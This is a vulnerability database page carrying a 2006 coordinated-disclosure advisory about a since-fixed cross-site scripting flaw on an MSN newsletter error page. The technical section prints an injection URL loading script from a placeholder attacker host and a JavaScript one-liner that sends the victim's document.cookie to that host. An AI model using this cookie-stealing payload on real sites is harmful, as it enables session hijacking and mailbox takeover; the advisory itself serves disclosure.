Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

msnXSSCB.txt

🗓️ 26 Jul 2006 00:00:00Reported by securiteam.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 36 Views

A cookie-stealing Cross-site scripting vulnerability on MSN website led to potentially accessing a victim's Inbox. Resolved within a week of disclosure

Show more
Code
`Summary  
-------  
A cookie-stealing Cross-site scripting vulnerability was found on MSN's   
website (msn.com). Using this vulnerability, an attacker could potentially   
gain access to a victim's Inbox.  
  
This vulnerability was discovered by: tontonq and Nir Goldshlager.  
  
Disclosure timeline  
-------------------  
SecuriTeam was asked to assist the researchers with contacting Microsoft.  
  
Reported to vendor: 18th of July, 2006.  
Vendor response: 18th of July, 2006.  
Resolved: 19th of July, 2006.  
Public disclosure: 25th of July, 2006.  
  
Technical description  
---------------------  
A cookie-stealing XSS issue was discovered on MSN's web site.  
  
Example of the issue:  
http://newsletters.msn.com/hm/HMError.asp?CB=http://yourcookiestealer/stealer.js  
That error page gets the CB variable into a script tag.  
  
If John Doe wanted to steal a victim's cookie, he could use this example   
Javascript   
code:  
i=new/**/Image();i.src='http://his_stealer/s.php?cookie='+document.cookie;  
  
As such, if for example, s.php stores the cookie variable somewhere, the   
attacker can set that stored cookie and "jump" to the Inbox.  
  
For illustration, an older similar issue from 2005 on hotmail.com discovered   
by Alex de Vries can be found here:  
http://www.net-force.nl/files/articles/hotmail_xss/  
  
About SecuriTeam's Assisted Disclosure  
--------------------------------------  
Many researchers do not have the time, energy or inclination to deal with   
reporting a vulnerability to vendors.  
  
SecuriTeam is here to help. If you want us to handle the logistics of   
contacting and following up with the vendor, making sure the problem is   
fixed, contact: [email protected].  
  
Our end goal is Full Disclosure, preferably in coordination with the vendor,   
without exposing the researcher to unnecessary risk.  
We do not believe in hiding or selling vulnerabilities. Never had, never will.  
  
All credit will be properly attributed. If asked we can act as proxies,   
keeping your privacy and anonymity.  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Jul 2006 00:00Current
7.4High risk
Vulners AI Score7.4
msncross-site scriptingvulnerabilityinbox accessdisclosuresecuriteam
36
.json
Report